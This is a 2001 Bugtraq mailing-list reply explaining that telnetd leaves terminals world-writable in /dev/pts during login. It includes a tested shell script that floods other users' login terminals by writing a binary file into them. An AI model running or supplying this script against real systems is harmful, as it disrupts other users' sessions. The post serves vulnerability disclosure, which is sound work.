[18411] in bugtraq
Re: Securax Advisory 13
daemon@ATHENA.MIT.EDU (teleh0r)
Wed Jan 3 12:07:32 2001
Content-Type: text/plain; charset="iso-8859-1"
Mime-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <01010306354802.02032@localhost.localdomain>
Date: Wed, 3 Jan 2001 06:35:48 +0100
Reply-To: teleh0r <teleh0r@DOGLOVER.COM>
From: teleh0r <teleh0r@DOGLOVER.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
I wrote a shell script which would flood the terminal of a user
trying to log in a long time ago - it was placed on my website
and someone called: "c0sa_n0stra", mailed me and asked me to
explain how it worked and then he was kind enough to send it to
packetstorm, adding his handle in the process (and a ascii cow).
(http://packetstorm.securify.com/DoS/m000h.sh)
The problem is the way that the telnet daemon assigns a new user
a terminal - when a user is telling the telnetd who he is, and
what his password is, his terminal will be awaiting in /dev/pts/
and writable by anyone. As soon as he has logged in, it will not.
It is still possible for him to log in though, even if a binary is
cat'ed to the terminal.
(but as said by Fyodor, it may mess-up his terminal)
sshd/rshd/rlogind do not behave this way - there will be no writable
terminal in /dev/pts/ while the authentication is taking place.
The below script has been tested on Redhat 6.1 and 6.2.
----
#!/bin/sh
TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY
while :; do
for i in $TTYDIR/* ; do
if [ -w $i -a -c $i -a $i != $MYTTY ]; then
cat $NONSENSE > $i
fi
done
done
unset i
----
Sincerely yours,
teleh0r
--
To avoid criticism, do nothing, say nothing, be nothing.
-- Elbert Hubbard
